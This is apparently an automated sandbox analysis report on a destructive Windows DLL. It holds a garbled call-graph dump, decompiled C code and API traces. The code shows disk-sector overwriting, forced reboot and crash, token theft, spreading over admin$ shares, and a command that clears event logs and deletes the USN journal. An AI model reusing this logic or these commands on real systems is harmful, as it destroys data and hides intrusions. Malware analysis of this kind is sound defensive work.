6802 11e6757 6799->6802 6801 11e6762 htons inet_addr connect 6800->6801 6800->6802 6801->6802 6802->6454 7306 11e270a 6803->7306 6807 11e2f2c 6808 11e2f47 6807->6808 6809 11e2f35 6807->6809 6811 11e688f 3 API calls 6808->6811 6810 11e20d0 2 API calls 6809->6810 6812 11e2f1b 6810->6812 6813 11e2f58 6811->6813 6812->6454 6814 11e2f68 6813->6814 6815 11e243f 5 API calls 6813->6815 6816 11e20d0 2 API calls 6814->6816 6815->6814 6817 11e2f77 6816->6817 6818 11e20d0 2 API calls 6817->6818 6818->6812 7336 11e2620 6819->7336 6822 11e36c7 6822->6454 6824 11e36d8 6825 11e36e1 6824->6825 6826 11e36f3 6824->6826 6827 11e20d0 2 API calls 6825->6827 6828 11e688f 3 API calls 6826->6828 6827->6822 6829 11e3704 6828->6829 6830 11e243f 5 API calls 6829->6830 6833 11e3714 6829->6833 6830->6833 6831 11e20d0 2 API calls 6832 11e3723 6831->6832 6834 11e20d0 2 API calls 6832->6834 6833->6831 6834->6822 7360 11e1000 GetProcessHeap RtlAllocateHeap 6835->7360 6837 11e3c19 6838 11e3c27 memset 6837->6838 6840 11e3c22 6837->6840 6839 11e3c39 6838->6839 6839->6839 6841 11e3c4e memset 6839->6841 6840->6454 6842 11e3469 15 API calls 6841->6842 6843 11e3c84 6842->6843 6844 11e20d0 2 API calls 6843->6844 6844->6840 6846 11e30fe 13 API calls 6845->6846 6847 11e5a60 6846->6847 6848 11e31fb 13 API calls 6847->6848 6849 11e5a77 6848->6849 6849->6454 6851 11e20d6 GetProcessHeap HeapFree 6850->6851 6852 11e20e9 6850->6852 6851->6852 6852->6455 7361 11e1000 GetProcessHeap RtlAllocateHeap 6853->7361 6855 11e320c 6856 11e2466 3 API calls 6855->6856 6857 11e322a 6855->6857 6859 11e3250 6856->6859 6871 11e32a5 6857->6871 7363 11e1000 GetProcessHeap RtlAllocateHeap 6857->7363 6875 11e3257 6859->6875 7362 11e1000 GetProcessHeap RtlAllocateHeap 6859->7362 6861 11e32b9 6862 11e32c2 6861->6862 6863 11e32cc 6861->6863 6866 11e20d0 2 API calls 6862->6866 6869 11e688f 3 API calls 6863->6869 6864 11e20d0 2 API calls 6864->6857 6865 11e3267 6867 11e326d 6865->6867 6868 11e327a 6865->6868 6866->6871 6872 11e20d0 2 API 

    Executed Functions

    C-Code - Quality: 80%
    			E011E7DEB(signed int _a4, long _a8, void _a12, void* _a16) {
    				void* _v8;
    				struct _OSVERSIONINFOW _v284;
    				char _v540;
    				short _v542;
    				short _v2588;
    				char _v18972;
    				void* _t91;
    				struct HINSTANCE__* _t104;
    				intOrPtr _t110;
    				void* _t116;
    				signed int _t121;
    				void* _t123;
    				void* _t126;
    				signed int _t139;
    				intOrPtr _t155;
    				intOrPtr _t156;
    				intOrPtr* _t159;
    				void* _t160;
    
    				E011EA4F0(0x4a18);
    				E011E7CC0();
    				if(_a16 != 0xffffffff) {
    					E011E9590(_t149, _a4, _a8, _a12);
    				}
    				__imp__#115(0x202, 0x11ff768); // executed; ws2_32 ordinal 115 is WSAStartup (see the APIs list below)
    				 *0x11ff140 = E011E7091(0x24, E011E6EDA, 0, 0xffff);
    				 *0x11ff108 = E011E7091(8, E011E6C74, E011E6CAA, 0xff);
    				 *0x11ff110 = 0;
    				InitializeCriticalSection(0x11ff124);
    				E011E6A2B(_t149, _a12);
    				_t162 =  *0x11ff144 & 0x00000002;
    				if(( *0x11ff144 & 0x00000002) != 0) {
    					E011E835E(_t162); // executed
    					E011E8D5A(_t149); // executed
    				}
    				E011E84DF();
    				CreateThread(0, 0, E011E7C10, 0, 0, 0); // executed
    				if(( *0x11ff144 & 0x00000002) != 0 && ( *0x11ff104 & 0x00000001) != 0) {
    					E011E7545();
    				}
    				_t155 =  *0x11ff108; // 0x2e6710
    				E011E70FA(_t155);
    				if(( *0x11ff104 & 0x00000002) != 0) {
    					_t139 =  *0x11ff144; // 0x3
    					E011E8999(_t149, _t139 & 0x00000006); // executed
    				}
    				_t167 =  *0x11ff144 & 0x00000004;
    				if(( *0x11ff144 & 0x00000004) == 0) {
    					L28:
    					_t156 =  *0x11ff110; // 0x0
    					E011E70FA(_t156);
    					CreateThread(0, 0, E011EA0FE, 0, 0, 0); // executed
    					_a16 = 0;
    					_a4 = 0;
    					_a12 = 0;
    					_a8 = 0;
    					E011E8282(_t149,  &_a16,  &_a4,  &_a12,  &_a8);
    					_t91 = HeapAlloc(GetProcessHeap(), 8, 4);
    					_v8 = _t91;
    					if(_t91 != 0) {
    						_t149 = _a12 * 0xea60;
    						 *_t91 = _a12 * 0xea60; // executed
    						_t116 = CreateThread(0, 0, E011EA274, _t91, 0, 0); // executed
    						if(_t116 == 0) {
    							HeapFree(GetProcessHeap(), 0, _v8);
    						}
    					}
    					Sleep(_a16 * 0xea60);
    					if(( *0x11ff104 & 0x00000010) != 0) {
    						E011E1EEF(_t149); // executed
    					}
    					Sleep(_a8 * 0xea60); // executed
    					if(( *0x11ff144 & 0x00000002) != 0) {
    						L43:
    						Sleep(_a4 * 0xea60); // executed
    						wsprintfW( &_v2588, L"wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:",  *0x11ff148 & 0x0000ffff);
    						_t160 = _t160 + 0xc;
    						_v542 = 0;
    						E011E83BD( &_v2588, 3); // executed
    						if(( *0x11ff144 & 0x00000001) != 0) {
    							_t104 = GetModuleHandleA("ntdll.dll");
    							if(_t104 != 0) {
    								_t104 = GetProcAddress(_t104, "NtRaiseHardError");
    								if(_t104 != 0) {
    									_t104 = _t104->i(0xc0000350, 0, 0, 0, 6,  &_a12); // executed
    								}
    							}
    							__imp__InitiateSystemShutdownExW(0, 0, 0, 1, 1, 0x80000000);
    							if(_t104 == 0) {
    								ExitWindowsEx(6, 0);
    							}
    						}
    						goto L42;
    					} else {
    						memset( &_v284, 0, 0x114);
    						_t160 = _t160 + 0xc;
    						_v284.dwOSVersionInfoSize = 0x114;
    						if(GetVersionExW( &_v284) == 0) {
    							goto L43;
    						}
    						_t110 = _v284.dwMinorVersion;
    						if(_v284.dwMajorVersion != 5 || _t110 != 1 && _t110 != 2) {
    							if(_v284.dwMajorVersion != 6 || _t110 != 0 && _t110 != 1) {
    								goto L43;
    							} else {
    								goto L41;
    							}
    						} else {
    							L41:
    							E011E6BB0( &_v18972);
    							if(E011E7D6F( &_v18972) == 0) {
    								goto L43;
    							}
    							L42:
    							ExitProcess(0);
    						}
    					}
    				}
    				 *0x11ff110 = E011E7091(4, E011E7CA5, 0, 0xff);
    				_push( &_v540);
    				_t121 = E011E875A(_t167);
    				if(_t121 != 0) {
    					_t159 =  &_v540;
    					_a4 = _t121;
    					do {
    						_v8 =  *_t159;
    						_a12 = 0;
    						_a8 = 0;
    						_t123 = CreateThread(0, 0, E011E9F8E, 0, 4, 0);
    						_a12 = _t123;
    						if(_t123 == 0) {
    							_a8 = 0x57;
    							goto L19;
    						}
    						if(SetThreadToken( &_a12, _v8) == 0) {
    							_a8 = GetLastError();
    							L17:
    							CloseHandle(_a12);
    							goto L19;
    						}
    						if(ResumeThread(_a12) != 0xffffffff) {
    							goto L19;
    						}
    						goto L17;
    						L19:
    						SetLastError(_a8);
    						_a8 =  *_t159;
    						_a12 = 0;
    						_t126 = CreateThread(0, 0, E011E7D58,  &_a12, 4, 0);
    						_a16 = _t126;
    						if(_t126 != 0) {
    							if(SetThreadToken( &_a16, _a8) != 0) {
    								if(ResumeThread(_a16) == 0xffffffff) {
    									GetLastError();
    								} else {
    									WaitForSingleObject(_a16, 0xffffffff);
    								}
    							}
    							CloseHandle(_a16);
    						}
    						if(_a12 != 0) {
    							E011E7298(_t149,  *0x11ff110, _t159, 0);
    						}
    						_t159 = _t159 + 4;
    						_t40 =  &_a4;
    						 *_t40 = _a4 - 1;
    					} while ( *_t40 != 0);
    				}
    			}

    APIs
      • Part of subcall function 011E7CC0: GetTickCount.KERNEL32(?,011E7E00), ref: 011E7CCB
      • Part of subcall function 011E7CC0: GetModuleFileNameW.KERNEL32(C:\Users\luketaylor\Desktop\abc.dll,0000030C,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,011E7E00), ref: 011E7D27
      • Part of subcall function 011E7CC0: CreateFileW.KERNEL32(C:\Users\luketaylor\Desktop\abc.dll,80000000,00000001,00000000,00000003,00000000,00000000), ref: 011E8AEC
      • Part of subcall function 011E7CC0: GetFileSize.KERNEL32(00000000,00000000), ref: 011E8AFD
      • Part of subcall function 011E7CC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E8B0C
      • Part of subcall function 011E7CC0: HeapAlloc.KERNEL32(00000000), ref: 011E8B13
      • Part of subcall function 011E7CC0: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 011E8B2C
      • Part of subcall function 011E7CC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E8B3D
      • Part of subcall function 011E7CC0: HeapFree.KERNEL32(00000000), ref: 011E8B44
      • Part of subcall function 011E7CC0: CloseHandle.KERNEL32(?), ref: 011E8B63
    • WSAStartup.WS2_32(00000202,011FF768), ref: 011E7E1E
      • Part of subcall function 011E7091: GetProcessHeap.KERNEL32(00000008,00000034,00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70A1
      • Part of subcall function 011E7091: HeapAlloc.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70AA
      • Part of subcall function 011E7091: InitializeCriticalSection.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70B3
      • Part of subcall function 011E7091: GetProcessHeap.KERNEL32(00000008,000000FF,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70DE
      • Part of subcall function 011E7091: HeapAlloc.KERNEL32(00000000,?,?,?,011E7E38,00000024,011E6EDA,00000000,0000FFFF), ref: 011E70E1
    • InitializeCriticalSection.KERNEL32(011FF124,00000008,011E6C74,011E6CAA,000000FF,00000024,011E6EDA,00000000,0000FFFF), ref: 011E7E63
      • Part of subcall function 011E6A2B: CommandLineToArgvW.SHELL32(?,?), ref: 011E6A61
      • Part of subcall function 011E6A2B: StrToIntW.SHLWAPI(00000000), ref: 011E6A75
      • Part of subcall function 011E6A2B: StrStrW.SHLWAPI(00000000,011F3FF0), ref: 011E6A95
      • Part of subcall function 011E6A2B: StrChrW.SHLWAPI(00000000,0000003A), ref: 011E6AA2
      • Part of subcall function 011E6A2B: LocalFree.KERNEL32(00000000,?,00000000,?,?,011E7E71,?), ref: 011E6ACF
      • Part of subcall function 011E84DF: GetLocalTime.KERNEL32(?,00000000), ref: 011E84F1
      • Part of subcall function 011E84DF: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 011E8533
      • Part of subcall function 011E84DF: PathAppendW.SHLWAPI(?,shutdown.exe /r /f), ref: 011E854D
      • Part of subcall function 011E84DF: wsprintfW.USER32 ref: 011E8589
      • Part of subcall function 011E84DF: wsprintfW.USER32 ref: 011E85A9
    • CreateThread.KERNEL32(00000000,00000000,011E7C10,00000000,00000000,00000000), ref: 011E7E99
    • NtRaiseHardError.NTDLL(C0000350,00000000,00000000,00000000,00000006,?), ref: 011E8190
      • Part of subcall function 011E7545: GetCurrentProcess.KERNEL32(?,76E6DE72,?,011E7EB2), ref: 011E755C
      • Part of subcall function 011E7545: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,76E6DE72,?,011E7EB2), ref: 011E7571
      • Part of subcall function 011E7545: GetProcAddress.KERNEL32(00000000,?,76E6DE72,?,011E7EB2), ref: 011E7578
      • Part of subcall function 011E7545: IsWow64Process.KERNELBASE(00000000,?,?,76E6DE72,?,011E7EB2), ref: 011E7587
      • Part of subcall function 011E7545: FindResourceW.KERNEL32(00000001,0000000A), ref: 011E759B
      • Part of subcall function 011E7545: GetTempPathW.KERNEL32(00000208,?), ref: 011E75CC
      • Part of subcall function 011E7545: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,?,76E6DE72,?,011E7EB2), ref: 011E75EA
      • Part of subcall function 011E7545: CoCreateGuid.OLE32(?), ref: 011E7608
      • Part of subcall function 011E7545: StringFromCLSID.OLE32(?,?), ref: 011E7621
      • Part of subcall function 011E7545: wsprintfW.USER32 ref: 011E765E
      • Part of subcall function 011E7545: CreateThread.KERNEL32(00000000,00000000,011E73FD,?,00000000,00000000), ref: 011E7675
      • Part of subcall function 011E7545: memset.MSVCRT ref: 011E7698
      • Part of subcall function 011E7545: wsprintfW.USER32 ref: 011E76C0
      • Part of subcall function 011E7545: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E76E5
      • Part of subcall function 011E7545: WaitForSingleObject.KERNEL32(?,0000EA60), ref: 011E76F7
      • Part of subcall function 011E7545: TerminateThread.KERNELBASE(?,00000000), ref: 011E770C
      • Part of subcall function 011E7545: CloseHandle.KERNEL32(?), ref: 011E7715
      • Part of subcall function 011E7545: DeleteFileW.KERNELBASE(?,?,?), ref: 011E7744
      • Part of subcall function 011E7545: CoTaskMemFree.OLE32(?), ref: 011E774D
      • Part of subcall function 011E7545: GetProcessHeap.KERNEL32(00000000,?,?,76E6DE72,?,011E7EB2), ref: 011E776A
      • Part of subcall function 011E7545: HeapFree.KERNEL32(00000000,?,76E6DE72), ref: 011E7771
      • Part of subcall function 011E835E: PathFileExistsW.SHLWAPI(?), ref: 011E8381
      • Part of subcall function 011E835E: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,04000000,00000000), ref: 011E83A1
      • Part of subcall function 011E835E: ExitProcess.KERNEL32(00000000), ref: 011E83B6
      • Part of subcall function 011E8D5A: CreateFileA.KERNEL32(\\.\C:,40000000,00000003,00000000,00000003,00000000,00000000), ref: 011E8D79
      • Part of subcall function 011E8D5A: DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 011E8D9A
      • Part of subcall function 011E8D5A: LocalAlloc.KERNEL32(00000000,?), ref: 011E8DAD
      • Part of subcall function 011E8D5A: SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 011E8DC0
      • Part of subcall function 011E8D5A: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 011E8DD2
      • Part of subcall function 011E8D5A: LocalFree.KERNEL32(00000000), ref: 011E8DD9
      • Part of subcall function 011E8D5A: CloseHandle.KERNEL32(00000000), ref: 011E8DE0
      • Part of subcall function 011E70FA: EnterCriticalSection.KERNEL32(002E6710,011E7EBD), ref: 011E70FF
      • Part of subcall function 011E70FA: InterlockedExchange.KERNEL32(002E6738,00000001), ref: 011E710B
      • Part of subcall function 011E70FA: LeaveCriticalSection.KERNEL32(002E6710), ref: 011E7112
    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 011E819E
      • Part of subcall function 011E875A: memset.MSVCRT ref: 011E878C
      • Part of subcall function 011E875A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011E87A4
      • Part of subcall function 011E875A: Process32FirstW.KERNEL32 ref: 011E87C5
      • Part of subcall function 011E875A: OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 011E87FF
      • Part of subcall function 011E875A: OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 011E8818
      • Part of subcall function 011E875A: GetTokenInformation.ADVAPI32(000000FF,0000000C,?,00000004,?), ref: 011E883E
      • Part of subcall function 011E875A: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 011E8867
      • Part of subcall function 011E875A: memset.MSVCRT ref: 011E887D
      • Part of subcall function 011E875A: GetTokenInformation.ADVAPI32(?,0000000A,?,00000038,?,?,00000000,?), ref: 011E8897
      • Part of subcall function 011E875A: SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 011E88C6
      • Part of subcall function 011E875A: CloseHandle.KERNEL32(?), ref: 011E8901
      • Part of subcall function 011E875A: CloseHandle.KERNEL32(?), ref: 011E8907
      • Part of subcall function 011E875A: Process32NextW.KERNEL32(?,?), ref: 011E8919
      • Part of subcall function 011E875A: GetLastError.KERNEL32 ref: 011E8929
      • Part of subcall function 011E875A: CloseHandle.KERNEL32(?), ref: 011E8933
      • Part of subcall function 011E8999: FindResourceW.KERNEL32(00000003,0000000A,00000000), ref: 011E89B9
      • Part of subcall function 011E8999: GetProcessHeap.KERNEL32(00000008,00000208,002E6710), ref: 011E89EA
      • Part of subcall function 011E8999: HeapAlloc.KERNEL32(00000000), ref: 011E89ED
      • Part of subcall function 011E8999: GetWindowsDirectoryW.KERNEL32(00000000,00000104), ref: 011E8A0A
      • Part of subcall function 011E8999: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000), ref: 011E8A1A
      • Part of subcall function 011E8999: PathAppendW.SHLWAPI(dllhost.dat), ref: 011E8A51
      • Part of subcall function 011E8999: GetProcessHeap.KERNEL32(00000000), ref: 011E8A61
      • Part of subcall function 011E8999: HeapFree.KERNEL32(00000000), ref: 011E8A64
      • Part of subcall function 011E8999: GetLastError.KERNEL32(01442A10,?,00000000), ref: 011E8A88
      • Part of subcall function 011E8999: GetProcessHeap.KERNEL32(00000000,?), ref: 011E8AB7
      • Part of subcall function 011E8999: HeapFree.KERNEL32(00000000), ref: 011E8ABA
      • Part of subcall function 011E8999: SetLastError.KERNEL32(?), ref: 011E8AC0
    • CreateThread.KERNEL32(00000000,00000000,011E9F8E,00000000,00000004,00000000), ref: 011E7F2B
    • SetThreadToken.ADVAPI32(?,?), ref: 011E7F3B
    • ResumeThread.KERNEL32(?), ref: 011E7F48
    • GetLastError.KERNEL32 ref: 011E7F55
    • CloseHandle.KERNEL32(?), ref: 011E7F61
    • SetLastError.KERNEL32(00000057), ref: 011E7F73
    • CreateThread.KERNEL32(00000000,00000000,011E7D58,?,00000004,00000000), ref: 011E7F8F
    • SetThreadToken.ADVAPI32(000000FF,00000057), ref: 011E7F9F
    • ResumeThread.KERNEL32(000000FF), ref: 011E7FAC
    • WaitForSingleObject.KERNEL32(000000FF,000000FF), ref: 011E7FBC
    • GetLastError.KERNEL32 ref: 011E7FC4
    • CloseHandle.KERNEL32(000000FF), ref: 011E7FCD
      • Part of subcall function 011E7298: EnterCriticalSection.KERNEL32(?,00000000,00000000,00000000,-00000002,?,011E6FFB,00000001,?,00000000), ref: 011E72B9
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,00000008,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E72EA
      • Part of subcall function 011E7298: HeapAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E72F3
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,?,?,011E6FFB,00000001,?,00000000), ref: 011E730B
      • Part of subcall function 011E7298: HeapAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E730E
      • Part of subcall function 011E7298: memcpy.MSVCRT ref: 011E733F
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000000,?,?,011E6FFB,00000001,?,00000000), ref: 011E7358
      • Part of subcall function 011E7298: HeapFree.KERNEL32(00000000,?,011E6FFB), ref: 011E735B
      • Part of subcall function 011E7298: GetProcessHeap.KERNEL32(00000008,?,?,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E7373
      • Part of subcall function 011E7298: HeapReAlloc.KERNEL32(00000000,?,011E6FFB,00000001,?,00000000), ref: 011E737A
      • Part of subcall function 011E7298: LeaveCriticalSection.KERNEL32(?,00000001,00000000,?,011E6FFB,00000001,?,00000000), ref: 011E739E
    • CreateThread.KERNEL32(00000000,00000000,011EA0FE,00000000,00000000,00000000), ref: 011E8006
      • Part of subcall function 011E8282: NetServerGetInfo.NETAPI32(00000000,00000065,?,00000000,00000000,76E6DE72,?,?,011E8029,000000FF,?,?,?), ref: 011E82A8
      • Part of subcall function 011E8282: NetApiBufferFree.NETAPI32(?,?,?,011E8029,000000FF,?,?,?), ref: 011E82C1
    • GetProcessHeap.KERNEL32(00000008,00000004,000000FF,?,?,?), ref: 011E8033
    • HeapAlloc.KERNEL32(00000000), ref: 011E8036
    • CreateThread.KERNEL32(00000000,00000000,011EA274,00000000,00000000,00000000), ref: 011E8058
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011E8062
    • HeapFree.KERNEL32(00000000), ref: 011E8065
    • Sleep.KERNELBASE(000000FF), ref: 011E807B
    • ExitWindowsEx.USER32(00000006,00000000), ref: 011E81AF
      • Part of subcall function 011E1EEF: GetLogicalDrives.KERNEL32 ref: 011E1EF7
      • Part of subcall function 011E1EEF: GetDriveTypeW.KERNELBASE(?,?,?,?,011E808B), ref: 011E1F2E
      • Part of subcall function 011E1EEF: LocalAlloc.KERNEL32(00000040,00000020,?,?,?,011E808B), ref: 011E1F3D
      • Part of subcall function 011E1EEF: CreateThread.KERNEL32(00000000,00000000,011E1E51,00000000,00000000,00000000), ref: 011E1F66
    • Sleep.KERNELBASE(?), ref: 011E8095
    • memset.MSVCRT ref: 011E80AE
    • GetVersionExW.KERNEL32(?), ref: 011E80C3
      • Part of subcall function 011E6BB0: wsprintfW.USER32 ref: 011E6BD3
      • Part of subcall function 011E6BB0: EnterCriticalSection.KERNEL32(011FF124,00000000,00000114,76E6C426), ref: 011E6BFE
      • Part of subcall function 011E6BB0: StrCatW.SHLWAPI(?,?), ref: 011E6C4C
      • Part of subcall function 011E6BB0: StrCatW.SHLWAPI(?,011FB110), ref: 011E6C52
      • Part of subcall function 011E6BB0: SetLastError.KERNEL32(0000007A), ref: 011E6C5A
      • Part of subcall function 011E6BB0: LeaveCriticalSection.KERNEL32(011FF124), ref: 011E6C65
      • Part of subcall function 011E7D6F: Sleep.KERNEL32(00000BB8,127.0.0.1,?,?,00000114), ref: 011E7DB7
      • Part of subcall function 011E7D6F: PathFileExistsW.SHLWAPI(?), ref: 011E7DD4
    • ExitProcess.KERNEL32 ref: 011E8115
    • Sleep.KERNELBASE(?), ref: 011E8125
    • wsprintfW.USER32 ref: 011E813B
      • Part of subcall function 011E83BD: wsprintfW.USER32 ref: 011E83DC
      • Part of subcall function 011E83BD: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 011E8400
      • Part of subcall function 011E83BD: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 011E8412
      • Part of subcall function 011E83BD: lstrcatW.KERNEL32(?,\cmd.exe), ref: 011E8428
      • Part of subcall function 011E83BD: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 011E846F
      • Part of subcall function 011E83BD: Sleep.KERNELBASE(011E85C7), ref: 011E8485
    • GetModuleHandleA.KERNEL32(ntdll.dll,00000003), ref: 011E8168
    • GetProcAddress.KERNEL32(00000000,NtRaiseHardError), ref: 011E8178
      • Part of subcall function 011E9590: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,011E7E14,?,?,?), ref: 011E95CC
      • Part of subcall function 011E9590: memcpy.MSVCRT ref: 011E95E5
      • Part of subcall function 011E9590: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 011E9654
      • Part of subcall function 011E9590: VirtualFree.KERNEL32(00000000,?,00004000), ref: 011E9674
    Strings
    • wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:, xrefs: 011E8135
    • W, xrefs: 011E7F69
    • ntdll.dll, xrefs: 011E8163
    • NtRaiseHardError, xrefs: 011E8172
    • =B|v, xrefs: 011E813B
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 62%
    			E011E9987(int _a4, short* _a8, short* _a12, signed int _a16, int _a20, int _a24, long _a28, void* _a32, void* _a36, long _a40, signed int _a44, void* _a48, void* _a52, char _a64, void _a68, intOrPtr _a108, short _a112, int _a120, void _a124, struct _NETRESOURCE _a128, char* _a140, short _a144, char _a152, short _a168, char _a668, char _a672, char _a680, char _a1208, short _a2760, short _a2768, short _a4796, short _a4816, char _a6864) {
    				int _v0;
    				void* __ebx;
    				void* __esi;
    				signed int _t122;
    				int _t137;
    				WCHAR* _t142;
    				void* _t144;
    				signed int _t147;
    				int _t163;
    				signed int _t170;
    				long _t181;
    				int _t185;
    				short* _t188;
    				intOrPtr _t190;
    				int _t191;
    				signed int _t194;
    				WCHAR* _t203;
    				union tagTOKEN_TYPE _t206;
    				signed int _t213;
    				signed int _t214;
    				void* _t217;
    
    				_t214 = _t213 & 0xfffffff8;
    				E011EA4F0(0x11abc);
    				_t188 = 0;
    				_v0 = 0;
    				_a4 = 0;
    				_a20 = 0;
    				if(_a4 == 0) {
    					_a4 = 0x57;
    					goto L60;
    				} else {
    					_a144 = 0;
    					wsprintfW( &_a144, L"\\\\%s\\admin$", _a4);
    					_t194 = 7;
    					_a120 = 0;
    					memset( &_a124, 0, _t194 << 2);
    					_a140 =  &_a152;
    					_a124 = 1;
    					E011E8B70( &_a672);
    					_t203 = L"\\\\%ws\\admin$\\%ws";
    					wsprintfW( &_a4796, _t203, _a4,  &_a668);
    					_t217 = _t214 + 0x28;
    					while(1) {
    						_a2760 = 0;
    						_a12 = _t188;
    						_t137 = WNetAddConnection2W( &_a128, _a12, _a8, 0); // executed
    						_a36 = _t137;
    						wsprintfW( &_a2760, _t203, _a4,  &_a680);
    						_t217 = _t217 + 0x10;
    						_t142 = PathFindExtensionW( &_a2768);
    						if(_t142 == 0) {
    							goto L5;
    						}
    						 *_t142 = 0;
    						_t185 = PathFileExistsW( &_a2768); // executed
    						if(_t185 != 0) {
    							_a24 = 1;
    							L57:
    							__eflags = _a44;
    							if(_a44 == 0) {
    								WNetCancelConnection2W( &_a168, 0, 1); // executed
    							}
    							L60:
    							_t122 = _a16;
    							__eflags = _t122;
    							if(_t122 != 0) {
    								 *_t122 = _a20;
    							}
    							SetLastError(_a4);
    							return _v0;
    						} else {
    							_a28 = GetLastError();
    						}
    						L5:
    						_t190 =  *0x11ff11c; // 0x58778
    						_t144 = E011E8946(_t190,  &_a4816,  *0x11ff0fc, 1); // executed
    						_t191 = 0;
    						if(_t144 != 0) {
    							__eflags = _a8;
    							if(_a8 != 0) {
    								__eflags = _a12;
    								if(_a12 != 0) {
    									E011E6CE7(_a8, _a12);
    									 *0x11f6010 = 1;
    								}
    							}
    							_a36 = _t191;
    							_a32 = _t191;
    							_t147 = OpenThreadToken(GetCurrentThread(), 2, 1,  &_a36);
    							__eflags = _t147;
    							if(_t147 != 0) {
    								DuplicateTokenEx(_a36, 0x2000000, _t191, 2, 1,  &_a32);
    							}
    							_a20 = _t191;
    							while(1) {
    								__eflags = _a24 - _t191;
    								if(_a24 != _t191) {
    									break;
    								}
    								_a6864 = 0;
    								_a1208 = 0;
    								_a48 = _t191;
    								asm("stosd");
    								asm("stosd");
    								asm("stosd");
    								memset( &_a68, _t191, 0x40);
    								_t206 = 1;
    								_t217 = _t217 + 0xc;
    								_a64 = 0x44;
    								_a108 = 1;
    								_a112 = 0;
    								__eflags = _a20 - _t191;
    								if(__eflags == 0) {
    									E011E97A5( &_a6864,  &_a1208, __eflags, _a4);
    									_t191 = 0;
    									__eflags = 0;
    								}
    								__eflags = _a20 - _t206;
    								if(_a20 != _t206) {
    									L26:
    									__eflags = _a6864 - _t191;
    									if(_a6864 == _t191) {
    										L49:
    										_a28 = GetLastError();
    										L50:
    										_a20 = _a20 + 1;
    										__eflags = _a20 - 2;
    										if(_a20 < 2) {
    											continue;
    										}
    										__eflags = _a24 - _t191;
    										if(_a24 != _t191) {
    											break;
    										}
    										goto L52;
    									}
    									__eflags = _a1208 - _t191;
    									if(_a1208 == _t191) {
    										goto L49;
    									}
    									_push( &_a48);
    									_push( &_a64);
    									_push(_t191);
    									_push(_t191);
    									_push(0x8000000);
    									_push(_t191);
    									_push(_t191);
    									_push(_t191);
    									_push( &_a6864);
    									_push( &_a1208);
    									__eflags = _a32 - _t191;
    									if(_a32 == _t191) {
    										_t163 = CreateProcessW();
    									} else {
    										_t163 = CreateProcessAsUserW(_a32, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
    									}
    									__eflags = _t163 - _t191;
    									if(_t163 == _t191) {
    										goto L49;
    									} else {
    										WaitForSingleObject(_a48, 0xffffffff);
    										_a40 = _t191;
    										GetExitCodeProcess(_a48,  &_a40);
    										__eflags = _a128 - _t191;
    										if(_a128 != _t191) {
    											CloseHandle(_a128);
    										}
    										__eflags = _a120 - _t191;
    										if(_a120 != _t191) {
    											CloseHandle(_a120);
    										}
    										__eflags = _a124 - _t191;
    										if(_a124 != _t191) {
    											CloseHandle(_a124);
    										}
    										__eflags = _a52 - _t191;
    										if(_a52 != _t191) {
    											CloseHandle(_a52);
    										}
    										__eflags = _a48 - _t191;
    										if(_a48 != _t191) {
    											CloseHandle(_a48);
    										}
    										__eflags = _a20 - _t191;
    										if(_a20 != _t191) {
    											__eflags = _a20 - _t206;
    											if(_a20 != _t206) {
    												goto L48;
    											}
    											__eflags = _a40 - _t191;
    											_t170 = 0 | _a40 == _t191;
    											_a24 = _t170;
    											__eflags = _t170 - _t191;
    											if(_t170 != _t191) {
    												goto L50;
    											}
